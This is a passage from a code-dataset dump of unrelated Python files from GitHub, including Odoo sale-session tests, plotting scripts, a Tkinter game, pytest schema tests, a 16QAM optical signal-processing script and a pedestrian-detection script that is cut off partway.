self.assertEquals(wizard.journal_line_ids.amount_total, 100)\n self.assertEquals(wizard.amount_next_session, wizard.balance_end)\n session.team_id.cash_money_balance_start = 10\n wizard = wizard_obj.with_context(new_env=True).create({\n 'session_id': session.id,\n })\n self.assertEquals(session.team_id.cash_money_balance_start, 10)\n self.assertEquals(wizard.amount_next_session, 10)\n self.assertEquals(wizard.amount_send, 90)\n wizard.action_confirm()\n self.assertEquals(session.close_date.date(), fields.Date.today())\n session.action_validate()\n 
self.assertEquals(session.validation_date.date(), fields.Date.today())\n\n def test_action_confirm_and_pay(self):\n payment_term = self.env['account.payment.term'].create({\n 'name': 'Test Payment term',\n })\n self.partner.property_payment_term_id = payment_term.id\n session = self.env['sale.session'].create({\n 'team_id': self.team.id\n })\n invoice_journal = self.env['account.journal'].search(\n [('type', '=', 'sale')], limit=1)\n cash_journal = self.env['account.journal'].search(\n [('type', '=', 'cash')], limit=1)\n self.team.write({\n 'invoice_journal_ids': [(6, 0, [invoice_journal.id])],\n 'default_payment_journal_id': cash_journal.id,\n })\n session.action_open()\n sale = self.env['sale.order'].create({\n 'partner_id': self.partner.id,\n 'team_id': self.team.id,\n 'session_id': session.id,\n 'order_line': [\n (0, 0, {\n 'product_id': self.product.id,\n 'price_unit': 100,\n 'product_uom_qty': 1}),\n ]\n })\n sale.session_pay(\n sale.amount_total, sale.team_id.default_payment_journal_id)\n self.assertEquals(sale.picking_ids.state, 'done')\n self.assertEquals(sale.state, 'sale')\n self.assertEquals(sale.invoice_ids.state, 'paid')\n self.assertEquals(len(sale.picking_ids), 1)\n invoice = sale.invoice_ids[0]\n self.assertFalse(invoice.payment_term_id)\n self.assertEquals(invoice.payment_ids[0].amount, sale.amount_total)\n\n def test_action_confirm_and_pay_with_wirzard(self):\n payment_term = self.env['account.payment.term'].create({\n 'name': 'Test Payment term',\n })\n self.partner.property_payment_term_id = payment_term.id\n session = self.env['sale.session'].create({\n 'team_id': self.team.id\n })\n invoice_journal = self.env['account.journal'].search(\n [('type', '=', 'sale')], limit=1)\n cash_journal = self.env['account.journal'].search(\n [('type', '=', 'cash')], limit=1)\n self.team.write({\n 'invoice_journal_ids': [(6, 0, [invoice_journal.id])],\n 'default_payment_journal_id': cash_journal.id,\n })\n session.action_open()\n sale = self.env['sale.order'].create({\n 'partner_id': self.partner.id,\n 'team_id': self.team.id,\n 'session_id': session.id,\n 'order_line': [\n (0, 0, {\n 'product_id': self.product.id,\n 'price_unit': 100,\n 'tax_id': [(6, 0, [])],\n 'product_uom_qty': 1}),\n ]\n })\n self.assertEquals(len(sale.order_line[0].tax_id), 0)\n wizard = self.env['sale.order.confirm_and_pay'].create({\n 'sale_id': sale.id,\n 'journal_id': cash_journal.id,\n 'amount': 250,\n })\n self.assertEquals(wizard.amount_total, 100)\n self.assertEquals(wizard.amount, 250)\n self.assertEquals(wizard.amount_change, 150)\n wizard.action_pay()\n invoice = sale.invoice_ids[0]\n self.assertEquals(invoice.payment_ids[0].amount, sale.amount_total)\n\n def test_action_confirm_and_pay_without_stock(self):\n location = self.env.ref('stock.stock_location_stock')\n inventory = self.env['stock.inventory'].create({\n 'name': 'add products for tests',\n 'filter': 'product',\n 'location_id': location.id,\n 'product_id': self.product.id,\n 'exhausted': True,\n })\n inventory.action_start()\n inventory.line_ids.write({\n 'product_qty': 0,\n 'location_id': location.id,\n })\n inventory._action_done()\n session = self.env['sale.session'].create({\n 'team_id': self.team.id,\n })\n journal = self.env['account.journal'].search(\n [('type', '=', 'cash')], limit=1)\n self.team.default_payment_journal_id = journal.id\n session.action_open()\n sale = self.env['sale.order'].create({\n 'partner_id': self.partner.id,\n 'team_id': self.team.id,\n 'session_id': session.id,\n 'order_line': [\n (0, 0, {\n 'product_id': 
self.product.id,\n 'price_unit': 100,\n 'product_uom_qty': 100}),\n ]\n })\n sale.session_pay(\n sale.amount_total, sale.team_id.default_payment_journal_id)\n self.assertEquals(sale.picking_ids.state, 'done')\n self.assertEquals(sale.state, 'sale')\n self.assertEquals(sale.invoice_ids.state, 'paid')\n self.assertEquals(len(sale.picking_ids), 1)\n","repo_name":"treytux/trey-addons","sub_path":"sale_session/tests/test_sale_team_cash_count.py","file_name":"test_sale_team_cash_count.py","file_ext":"py","file_size_in_byte":17606,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"40"} +{"seq_id":"32198238373","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom numpy import genfromtxt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport easygui\nimport sys\n\n'choose depth/heading etc'\nfilename = easygui.fileopenbox()\ntry:\n data = genfromtxt(filename, delimiter=',')\nexcept:\n sys.exit()\n\n# data = np.round(data, 1)\n\n# arbitrary time\nt = list(range(0,len(data)))\n\n# actual x\nx_actual = data[:,1]\n#actual y\ny_actual = data[:,2]\n\nx_commanded = data[:,4]\ny_commanded = data[:,6]\n\nfig, (ax1, ax2, ax3) = plt.subplots(3, constrained_layout=True)\nfig.suptitle('X and Y')\nax1.plot(t,x_actual)\nax1.plot(t,x_commanded)\nax1.set_title('X(Surge) over time')\nax2.plot(t,y_actual)\nax2.plot(t,y_commanded)\nax2.set_title('Y(Sway) over time')\n#X being north or 'up' so more like Y\nax3.plot(y_actual,x_actual)\nax3.plot(y_commanded,x_commanded)\nax3.set_title('X vs Y')\nplt.show()\n#plt.axis([0,len(x_actual)-1, min(x_actual) - abs((min(x_actual)/4)) ,max(x_actual) + abs((max(x_actual)/4))])\n\n\n","repo_name":"Ben-Bartlett/ArduSub_Dynamic_Positioning","sub_path":"development/plot_xy.py","file_name":"plot_xy.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"4529484789","text":"class PeriodicString:\n \"\"\"\n Find whether string S is periodic.\n Periodic indicates S = nP.\n e.g.\n S = \"ababab\", then n = 3, and P = \"ab\"\n S = \"xxxxxx\", then n = 1, and P = \"x\"\n S = \"aabbaaabba\", then n = 2, and P = \"aabba\"\n\n Given string S, find out the P (repetitive pattern) of S.\n \"\"\"\n\n def repeted_substring(self, str):\n N = len(str)\n _pattern = str[0]\n if N == 1:\n return str\n else:\n for i in range(N//2, 1, -1):\n if N % i == 0:\n if str[:i]*int(N//i) == str and str[:i] != str[0] * (i):\n if len(str[:i]) > len(_pattern):\n _pattern = str[:i]\n return _pattern\n\nps = PeriodicString()\nstr=\"ababab\"\n# str = 'xxxxxx'\n# str = \"aabbaaabba\"\n# str = \"blah\"\nprint(\"Repeted substring is: {} for string: {}\".format(\n ps.repeted_substring(str), str))\n","repo_name":"MichaelArslangul/python_Sandbox","sub_path":"PeriodicStrings.py","file_name":"PeriodicStrings.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9907652840","text":"\"\"\"program to print out list of names right alligned\r\nvuyolwethu nkosi\r\n23 april 2014\"\"\"\r\n\r\n#create empty list\r\nstring=[]\r\n#get list from user\r\nstrings=input(\"Enter strings (end with DONE):\\n\")\r\nwhile strings!=\"DONE\":\r\n string.append (strings)\r\n strings=input(\"\")\r\n#convert every string to its lengths\r\n#create list of lengths\r\nstring_1=[]\r\nfor i in range(len(string)):\r\n string_1.append (len(string[i]))\r\n#print(string_1)\r\nprint(\"\\nRight-aligned list:\")\r\nif 
string_1==[]:\r\n    print()\r\nelse:\r\n    x=max(string_1) #getting maximum length\r\nfor i in string:\r\n    y=" "*(x-(len(i))) #print spaces equivalent to the maximum word length minus the word being used\r\n    print(y,i,sep="") #print spaces and then word\r\n    \r\n    \r\n    \r\n    ","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_6/nksvuy001/question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"6523035723","text":"from tkinter import *\nfrom UI import UI\nfrom Bowl import Bowl\nfrom Fruit import Fruit\nfrom time import *\n#from RaspberrySenseHat import RaspberrySenseHat\n#from sense_hat import SenseHat \nclass Game:\n\n\tdef __init__(self):\n\t\t#self.sense = SenseHat()\n\t\tself.interface=UI(self)\n\t\tself.interface.displayMainMenu()\n\t\tself.listFruit=[]\n\t\tself.interface.root.TkMenu.mainloop()\n\t\tself.victory\n\t\t\n\tdef fruitFactory(self) :\n\t\tif(not self.victory): \n\t\t\tself.listFruit.append(Fruit(self.interface.getMenu()))\n\t\t\tif(not self.i<1000):\n\t\t\t\tself.i-=40\n\t\t\tself.interface.getMenu().TkMenu.after(self.i,self.fruitFactory)\n\t\t\t\n\tdef fruitFalling(self) : \n\t\tif(not self.victory):\n\t\t\tfor fruit in self.listFruit :\n\t\t\t\tFruit.moveDown(fruit,self.interface)\n\t\t\t\tif(Fruit.verifyCollisionBowl(fruit,self.bowl)):\n\t\t\t\t\tself.score+=fruit.point\n\t\t\t\t\t#self.SenseHat.add(fruit.color, fruit.point)\n\t\t\t\t\tself.listFruit.remove(fruit)\n\t\t\t\t\tself.victory=(self.score>=64)\n\t\t\t\telif(Fruit.verifyCollisionGround(fruit,self.interface.menu.taille)):\n\t\t\t\t\tself.listFruit.remove(fruit)\n\t\t\t\t\tself.life-=1\n\t\t\t\t\tif(self.life==2):\n\t\t\t\t\t\tself.interface.getMenu().canvasVie1.configure(bg="white")\n\t\t\t\t\telif(self.life==1):\n\t\t\t\t\t\tself.interface.getMenu().canvasVie2.configure(bg="white")\n\n\t\t\t\t\tprint(self.life)\n\t\t\t\t\tif(self.life==0):\n\t\t\t\t\t\tself.loose()\n\t\t\tif(not self.victory):\n\t\t\t\tself.interface.getMenu().TkMenu.after(60,self.fruitFalling)\n\t\t\telse :\n\t\t\t\tself.win()\n\n\tdef loop(self):\n\t\torientation = self.sense.get_orientation()\n\t\tpitch = orientation['pitch']\n\t\tif pitch > 25 and pitch <=90:\n\t\t\tself.bowl.move("right")\n\t\telif pitch<335 and pitch>270:\n\t\t\tself.bowl.move("left")\n\t\tself.interface.getMenu().TkMenu.after(5,self.loop)\n \n\n\tdef play(self):\n\t\tprint("Play !")\n\t\tself.i=2000\n\t\tself.life=3\n\t\tself.victory=False\n\t\tself.score=0\n\t\t#self.SenseHat = RaspberrySenseHat()\n\t\tself.interface.displayGameMenu()\n\t\tself.bowl=Bowl(self.interface.getMenu())\n\t\tself.interface.getMenu().TkMenu.bind('<KeyPress-Left>',lambda event :self.bowl.move("left"))\n\t\tself.interface.getMenu().TkMenu.bind('<KeyPress-Right>',lambda event :self.bowl.move("right"))\n\t\tself.fruitFactory()\n\t\tself.fruitFalling()\n\t\t#self.loop()\n\n\tdef win(self):\n\t\tprint("well play ! 
you won\")\n\t\tself.interface.displayWinMenu()\n\tdef loose(self):\n\t\tprint(\"you loose\")\n\t\tself.interface.displayLooseMenu()\n\ngame=Game()\n\n\n\n\n","repo_name":"NicolasGuruphat/dizzy-fruti_A-Raspberry-pi-project","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30726757192","text":"\"\"\"empty message\n\nRevision ID: ff81e71455ea\nRevises: d3461e6dc169\nCreate Date: 2020-10-13 06:55:13.271211\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = 'ff81e71455ea'\ndown_revision = 'd3461e6dc169'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('Venue', sa.Column('past_shows', sa.Integer(), nullable=True))\n op.add_column('Venue', sa.Column('upcoming_shows', sa.Integer(), nullable=True))\n op.create_foreign_key(None, 'Venue', 'Show', ['past_shows'], ['id'])\n op.create_foreign_key(None, 'Venue', 'Show', ['upcoming_shows'], ['id'])\n op.drop_column('Venue', 'genres')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('Venue', sa.Column('genres', postgresql.ARRAY(sa.VARCHAR()), autoincrement=False, nullable=True))\n op.drop_constraint(None, 'Venue', type_='foreignkey')\n op.drop_constraint(None, 'Venue', type_='foreignkey')\n op.drop_column('Venue', 'upcoming_shows')\n op.drop_column('Venue', 'past_shows')\n # ### end Alembic commands ###\n","repo_name":"Heila-Almogren/Fyyur","sub_path":"projects/01_fyyur/starter_code/migrations/versions/ff81e71455ea_.py","file_name":"ff81e71455ea_.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12235476619","text":"import numpy as np\nimport scipy.signal as signal\nfrom subfunction.Constellation import *\nfrom subfunction.DataNormalize import *\nfrom subfunction.Histogram2D import *\nfrom subfunction.IQimbaCompensator import *\n# from subfunction.corr import *\nfrom subfunction.BERcount import *\nfrom subfunction.SNR import *\nfrom subfunction.Downsample import *\n\nfrom CMA import *\n\nfrom KENG_Tx2Bit import *\nfrom KENG_downsample import *\nfrom KENG_phaserecovery import *\nfrom KENG_Parameter_16QAM import *\nfrom KENG_phaserecovery import *\nfrom KENG_correlation import *\n\nfrom Equalizer import *\nfrom Phaserecovery import *\n\n\nparameter = Parameter(r'data\\20200811_finisar B2B16QAM\\Vblock1.mat',simulation=False)\n\n\nprint('SymbolRate={}'.format(parameter.symbolRate / 1e9), 'Pamorder={}'.format(parameter.pamorder),\n 'resamplenumber={}'.format(parameter.resamplenumber))\nprint('Tx Length={}'.format(len(parameter.TxXI)), 'Rx Length={}'.format(len(parameter.RxXI)))\n# Tx Normalize\nTx2bit=KENG_Tx2Bit(PAM_order=4)\n\n\nTxXI ,TxXQ = DataNormalize(parameter.TxXI,parameter.TxXQ,parameter.pamorder)\nTxYI ,TxYQ = DataNormalize(parameter.TxYI,parameter.TxYQ,parameter.pamorder)\n\nTxXI=Tx2bit.return_Tx(TxXI)\nTxXQ=Tx2bit.return_Tx(TxXQ)\nTxYI=Tx2bit.return_Tx(TxYI)\nTxYQ=Tx2bit.return_Tx(TxYQ)\n\nTx_Signal_X=Constellation(TxXI,TxXQ,parameter.pamorder)\nTx_Signal_Y=Constellation(TxYI,TxYQ,parameter.pamorder)\nHistogram2D('Tx',Tx_Signal_X[0:10000])\n# Rx Upsample\nRx_XI, Rx_XQ = DataNormalize(signal.resample_poly(parameter.RxXI, 
up=parameter.upsamplenum, down=1),\n signal.resample_poly(parameter.RxXQ, up=parameter.upsamplenum, down=1),\n parameter.pamorder)\nRx_YI, Rx_YQ = DataNormalize(signal.resample_poly(parameter.RxYI, up=parameter.upsamplenum, down=1),\n signal.resample_poly(parameter.RxYQ, up=parameter.upsamplenum, down=1),\n parameter.pamorder)\n\nprint('Tx_Resample Length={}'.format(len(Tx_Signal_X)), 'Rx_Resample Length={}'.format(len(Rx_XI)))\nprbs = np.ceil(DataNormalize(parameter.PRBS, [], parameter.pamorder))\nsnrscan = np.zeros((parameter.resamplenumber, 1))\nevmscan = np.zeros((parameter.resamplenumber, 1))\n\n#Eye position scan2\nfor eyepos in range(7,8):\n down_num = eyepos\n Rx_XI_eye = signal.resample_poly(Rx_XI[down_num:], up=1, down=parameter.resamplenumber / 2)\n Rx_XQ_eye = signal.resample_poly(Rx_XQ[down_num:], up=1, down=parameter.resamplenumber / 2)\n Rx_YI_eye = signal.resample_poly(Rx_YI[down_num:], up=1, down=parameter.resamplenumber / 2)\n Rx_YQ_eye = signal.resample_poly(Rx_YQ[down_num:], up=1, down=parameter.resamplenumber / 2)\n \n Rx_Signal_X = Constellation(Rx_XI_eye, Rx_XQ_eye, parameter.pamorder)\n Rx_Signal_Y = Constellation(Rx_YI_eye, Rx_YQ_eye, parameter.pamorder)\n Histogram2D('Rx', Rx_Signal_X[0:32767])\n \n \n cma = CMA(Rx_Signal_X[:200000], Rx_Signal_Y[:200000])\n # cma = CMA(Rx_Signal_X, Rx_Signal_Y)\n print('CMA Batch Size={}'.format(cma.batchsize), 'CMA Stepsize={}'.format(cma.stepsize),\n 'CMA OverHead={}%'.format(cma.overhead * 100))\n # CMA Single\n # cma.run_single()\n # Rx_X_CMA, Rx_Y_CMA = Downsample(cma.rx_x_single, 2), Downsample(cma.rx_y_single, 2)\n # print(np.shape(Rx_X_CMA), cma.costfunx, cma.costfuny)\n # Histogram2D(Rx_X_CMA[cma.center:32767-cma.center+1])\n # CMA Batch\n cma.run_16qam()\n Rx_X_CMA, Rx_Y_CMA = Downsample(cma.rx_x_cma, 2, cma.center), Downsample(cma.rx_y_cma, 2, cma.center)\n print(cma.costfunx[0][0:10])\n Histogram2D('CMA', Rx_X_CMA[0])\n Rx_X_iqimba = IQimbaCompensator(Rx_X_CMA, 1e-4)\n Histogram2D(\"IQimba\", Rx_X_iqimba[0])\n \n \n phaserec = Phaserecovery(Rx_X_iqimba)\n # Rx_X_recovery, B, C = phaserec.PLL_(0.01, 0.707)\n Rx_X_recovery = phaserec.DD_PLL()\n Histogram2D('DD-PLL', Rx_X_recovery[0])\n\n ph=KENG_phaserecovery()\n # PLL_Rx=ph.QAM_4(Rx_X_iqimba[0],c1_radius=math.sqrt(2)+math.sqrt(2)/2,c2_radius=(math.sqrt(10)+math.sqrt(18))/2) \n # PLL_Rx=ph.QAM(Rx_X_iqimba[0],c1_radius=math.sqrt(2),c2_radius=math.sqrt(10))\n PLL_Rx=ph.QAM_4(Rx_X_iqimba[0],c1_radius=math.sqrt(2),c2_radius=math.sqrt(10))\n Histogram2D('KENG_PLL_ML',PLL_Rx[:,0]) \n \n \n Correlation=KENG_corr(window_length=150)\n Rx_real, Tx_real=Correlation.calculate_Rx(np.real(PLL_Rx[0:60000,0]),TxXI[0:60000]) \n Rx_imag, Tx_imag=Correlation.calculate_Rx(np.imag(-PLL_Rx[0:60000,0]),TxXQ[0:60000]) \n # Rx_real, Tx_real=Correlation.calculate_Rx(np.real(Rx_X_recovery[0,0:80000]),TxXI[0:80000]) \n # Rx_imag, Tx_imag=Correlation.calculate_Rx(np.imag(-Rx_X_recovery[0,0:80000]),TxXQ[0:80000]) \n\n\n # Rx_corr,Tx_corr=Correlation.calculate_Rx(PLL_Rx[0:90000,0],Tx_Signal_X[0:90000]) \n # snr, evm = SNR(np.array(Rx_corr[0:10000,0]), np.array(Tx_corr[0:10000,0]))\n # print(snr, evm)\n # Rx_real, Tx_real = corr(np.real(PLL_Rx[:,0]), TxXI[:,0], parameter.Prbsnum)\n # Rx_imag, Tx_imag = corr(np.imag(PLL_Rx[:,0]), TxXQ[:,0], parameter.Prbsnum)\n \n Rx_corr = Rx_real[0:35000] + 1j * Rx_imag[0:35000]\n Tx_corr = Tx_real[0:35000] + 1j * Tx_imag[0:35000]\n \n \n # Rx_corr, Tx_corr = corr(PLL_Rx[:,0], Tx_Signal_X, parameter.Prbsnum)\n # Rx_real, Tx_real = corr(np.real(Rx_X_recovery[0]), 
np.real(Tx_Signal_X), parameter.Prbsnum)\n # Rx_imag, Tx_imag = corr(np.imag(Rx_X_recovery[0]), np.imag(Tx_Signal_X), parameter.Prbsnum)\n # Rx_corr = Rx_real + 1j * Rx_imag\n # Tx_corr = Tx_real + 1j * Tx_imag\n # snr, evm = SNR(Rx_corr,Tx_corr)\n snr, evm = SNR(np.array(Rx_corr.T[0,:]), np.array(Tx_corr.T[0,:]))\n # bercount = BERcount(np.array(Tx_corr), np.array(Rx_corr), parameter.pamorder)\n # print(bercount)\n print(snr, evm)\n # snrscan[eyepos] = snr\n # evmscan[eyepos] = evm\n# print(np.max(snrscan), np.argmax(snrscan))\n#---\nequalizer_real = Equalizer(np.real(np.array(Tx_corr.T)[0,:]), np.real(np.array(Rx_corr.T)[0,:]), 3, [11, 31, 31], 0.5)\nequalizer_imag = Equalizer(np.imag(np.array(Tx_corr.T)[0,:]), np.imag(np.array(Rx_corr.T)[0,:]), 3, [11, 31, 31], 0.5)\nTx_volterra_real, Rx_volterra_real = equalizer_real.realvolterra()\nTx_volterra_imag, Rx_volterra_imag = equalizer_imag.realvolterra()\nTx_real_volterra = Tx_volterra_real + 1j * Tx_volterra_imag\nRx_real_volterra = Rx_volterra_real + 1j * Rx_volterra_imag\n#---\n# equalizer_complex = Equalizer(Tx_corr, Rx_corr, 3, [11, 3, 3], 0.5)\n# equalizer_complex = Equalizer( np.array(Tx_corr.T)[0,:], np.array(Rx_corr.T)[0,:], 3, [21, 3, 1], 0.1)\n\n# equalizer_real = Equalizer(np.real(Tx_corr), np.real(Rx_corr), 3, [11, 11, 11])\n# equalizer_imag = Equalizer(np.imag(Tx_corr), np.imag(Rx_corr), 3, [11, 11, 11])\n# Tx_volterra_real, Rx_volterra_real = equalizer_real.realvolterra()\n# Tx_volterra_imag, Rx_volterra_imag = equalizer_imag.realvolterra()\n# Tx_real_volterra = Tx_volterra_real + 1j * Tx_volterra_imag\n# Rx_real_volterra = Rx_volterra_real + 1j * Rx_volterra_imag\n# Tx_complex_volterra, Rx_complex_volterra = equalizer_complex.complexvolterra()\nsnr_volterra, evm_volterra = SNR(Tx_real_volterra, Rx_real_volterra)\n# snr_volterra, evm_volterra = SNR(Rx_complex_volterra, Tx_complex_volterra)\n# bercount = BERcount(Rx_complex_volterra, Tx_complex_volterra, parameter.pamorder)\n# bercount = BERcount(Tx_complex_volterra, Rx_complex_volterra, parameter.pamorder)\n# print(bercount)\nprint(snr_volterra, evm_volterra)\nHistogram2D(\"ComplexVolterra\", Rx_real_volterra, snr_volterra, evm_volterra)\n# if __name__ == '__main__':\n# main()","repo_name":"KENGQQ/pycharm_coherent_64QAM","sub_path":"QAM_exp.py","file_name":"QAM_exp.py","file_ext":"py","file_size_in_byte":7497,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"6120861977","text":"\"\"\"Test Order Charge validation.\"\"\"\nfrom briefy.leica.models.job.order import OrderCharge\nfrom briefy.leica.models.job.order import OrderCharges\n\nimport colander\nimport pytest\n\n\nvalid_data = (\n ('rescheduling', 1200, '', '669a99c2-9bb3-443f-8891-e600a15e3c10', '', '', ''),\n ('cancellation', 0, 'Foo bar', '669a99c2-9bb3-443f-8891-e600a15e3c10', '', '', ''),\n ('model_release', 123000, '20 people', '669a99c2-9bb3-443f-8891-e600a15e3c10', '', '', ''),\n ('property_release', 3000, 'Owner signed', '669a99c2-9bb3-443f-8891-e600a15e3c10', '', '', ''),\n ('other', 3000, 'Other reason', '669a99c2-9bb3-443f-8891-e600a15e3c10', '', '', ''),\n ('other', 3000, 'Other reason', '669a99c2-9bb3-443f-8891-e600a15e3c10', '', '', ''),\n)\n\n\n@pytest.mark.parametrize('data', valid_data)\ndef test_order_charge_serialization(data):\n \"\"\"Test successful OrderCharge serialization.\"\"\"\n payload = {\n 'category': data[0], 'amount': data[1], 'reason': data[2], 'created_by': data[3],\n 'id': data[4], 'invoice_number': data[5], 'invoice_date': 
data[6],\n }\n schema = OrderCharge()\n response = schema.deserialize(payload)\n assert response['category'] == payload['category']\n assert response['amount'] == payload['amount']\n assert response['reason'] == payload['reason']\n assert response['created_by'] == payload['created_by']\n assert response['id'] is not None\n\n\nwrong_data = (\n ('wrong_reason', 1200, '', '669a99c2-9bb3-443f-8891-e600a15e3c10'),\n ('work', 'wrong', 'Foo bar', '669a99c2-9bb3-443f-8891-e600a15e3c10'),\n ('work', 123000, 123, '669a99c2-9bb3-443f-8891-e600a15e3c10'),\n ('work', 123000, '', 'meu_login'),\n)\n\n\n@pytest.mark.parametrize('data', wrong_data)\ndef test_order_charge_serialization_failure(data):\n \"\"\"Test failed OrderCharge serialization.\"\"\"\n payload = {'category': data[0], 'amount': data[1], 'reason': data[2], 'created_by': data[3]}\n schema = OrderCharge()\n with pytest.raises(colander.Invalid):\n schema.deserialize(payload)\n\n\nvalid_charges = (\n valid_data,\n)\n\n\n@pytest.mark.parametrize('data', valid_charges)\ndef test_order_charges_serialization(data):\n \"\"\"Test successful OrderCharges serialization.\"\"\"\n payload = [\n {'category': i[0], 'amount': i[1], 'reason': i[2], 'created_by': i[3]}\n for i in data\n ]\n schema = OrderCharges()\n response = schema.deserialize(payload)\n assert len(response)\n assert response[0]['category'] == payload[0]['category']\n assert response[0]['amount'] == payload[0]['amount']\n assert response[0]['reason'] == payload[0]['reason']\n assert response[0]['created_by'] == payload[0]['created_by']\n assert response[0]['id'] is not None\n\n\ninvalid_charges = (\n wrong_data,\n)\n\n\n@pytest.mark.parametrize('data', invalid_charges)\ndef test_order_charges_serialization_failure(data):\n \"\"\"Test failed OrderCharges serialization.\"\"\"\n payload = [\n {'category': i[0], 'amount': i[1], 'reason': i[2], 'created_by': i[3]}\n for i in data\n ]\n schema = OrderCharges()\n with pytest.raises(colander.Invalid):\n schema.deserialize(payload)\n","repo_name":"BriefyHQ/briefy.leica","sub_path":"tests/models/job/test_order_charges.py","file_name":"test_order_charges.py","file_ext":"py","file_size_in_byte":3124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13440733803","text":"import random\n\nfrom db.run_sql import run_sql\n\nfrom models.pub import Pub\n\ndef save(pub):\n sql = \"INSERT INTO pubs (name) VALUES (%s) RETURNING *\"\n values = [pub.name]\n results = run_sql(sql, values)\n id = results[0]['id']\n pub.id = id\n\ndef select_all():\n pubs = []\n\n sql = \"SELECT * FROM pubs\"\n results = run_sql(sql)\n\n for row in results:\n pub = Pub(row['name'], row['id'])\n pubs.append(pub)\n\n return pubs\n\ndef delete_all():\n sql = \"DELETE FROM pubs\"\n run_sql(sql)\n\ndef get_pub(pubs):\n return random.choice(pubs)\n","repo_name":"hudhill/random_pub2.0","sub_path":"repositories/pub_repository.py","file_name":"pub_repository.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31468753350","text":"def saude_financeira():\r\n \r\n #receber os dados de renda e gastos do usuário\r\n renda_total = float(input(\"Informe sua renda mensal total: \"))\r\n moradia = float(input(\"Informe seus gastos mensais com moradia: \"))\r\n educacao = float(input(\"Informe seus gastos mensais com educação: \"))\r\n transporte = float(input(\"Informe seus gastos mensais com transporte: \"))\r\n \r\n #calcular a 
porcentagem de cada um dos gastos em relação à renda total\r\n percentual_moradia = (moradia/renda_total)*100 \r\n percentual_educ = (educacao/renda_total)*100\r\n percentual_transp = (transporte/renda_total)*100\r\n \r\n #arredondar para 2 casas decimais\r\n percentual_moradia = round(percentual_moradia,2)\r\n percentual_educ = round(percentual_educ,2)\r\n percentual_transp = round(percentual_transp,2)\r\n \r\n #calcular qual deveria ser o máximo de cada gasto em relação à renda total\r\n max_moradia = renda_total*0.3\r\n max_educ = renda_total*0.2\r\n max_transp = renda_total*0.15\r\n \r\n #arredondar para 2 casas decimais\r\n max_moradia = round(max_moradia,2)\r\n max_educ = round(max_educ,2)\r\n max_transp = round(max_transp,2)\r\n \r\n print(f\"\\nDiagnóstico:\")\r\n print(f\"Sua renda total é R${renda_total}.\\n\")\r\n \r\n #verificar se estão acima do máximo ideal (30%, 20% e 15%, respectivamente)\r\n print(f\"Seus gastos mensais com moradia equivalem a {percentual_moradia}% da sua renda total. O máximo recomendado é de 30%.\", end=' ')\r\n if percentual_moradia > 30:\r\n print(f\"Idealmente, o máximo de sua renda comprometida com moradia deveria ser de R$ {max_moradia}.\")\r\n else:\r\n print(\"Seus gastos estão dentro da margem recomendada.\")\r\n \r\n print(f\"Seus gastos mensais com educação equivalem a {percentual_educ}% da sua renda total. O máximo recomendado é de 20%.\", end = ' ')\r\n if percentual_educ > 20:\r\n print(f\"Idealmente, o máximo de sua renda comprometida com educação deveria ser de R$ {max_educ}.\")\r\n else:\r\n print(\"Seus gastos estão dentro da margem recomendada.\")\r\n \r\n print(f\"Seus gastos mensais com transporte equivalem a {percentual_transp}% da sua renda total. O máximo recomendado é de 15%.\", end = ' ')\r\n if percentual_transp > 15:\r\n print(f\"Idealmente, o máximo de sua renda comprometida com transporte deveria ser de R$ {max_transp}.\")\r\n else:\r\n print(\"Seus gastos estão dentro da margem recomendada.\")","repo_name":"thais-gsc/at-python","sub_path":"questao3_AT.py","file_name":"questao3_AT.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8196057098","text":"\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport cv2 as cv\r\nimport pickle\r\nimport time\r\n\r\n\r\nclass PedestrianDetection(object):\r\n def __init__(self, img_dir='DIR/pd_2.jpg'):\r\n self.img_dir = img_dir\r\n self.img = self.get_data(self.img_dir) # Image list, address\r\n # print(self.img.shape)\r\n self.img = cv.resize(self.img, (500, 300))\r\n # print(self.img.shape)\r\n self.hog = self.def_hog()\r\n self.clf = self.get_clf()\r\n self.detection()\r\n cv.destroyAllWindows()\r\n\r\n @staticmethod\r\n def get_data(img_dir):\r\n return cv.imread(img_dir)\r\n\r\n @staticmethod\r\n def get_clf():\r\n # print(\"Loading the model\", end='')\r\n with open('model.pickle', 'rb') as f:\r\n _clf = pickle.load(f)\r\n # print(\" ...\")\r\n return _clf\r\n\r\n def detection(self):\r\n # print(\"Detecting the pedestrians ...\")\r\n x_axis = self.img.shape[0]\r\n # print(x_axis)\r\n y_axis = self.img.shape[1]\r\n end_point = (x_axis - 160, y_axis - 96)\r\n # print(end_point)\r\n img_gray = cv.cvtColor(self.img, cv.COLOR_RGB2GRAY)\r\n # print(\"Prediction:\")\r\n for x in range(end_point[0])[::80]:\r\n 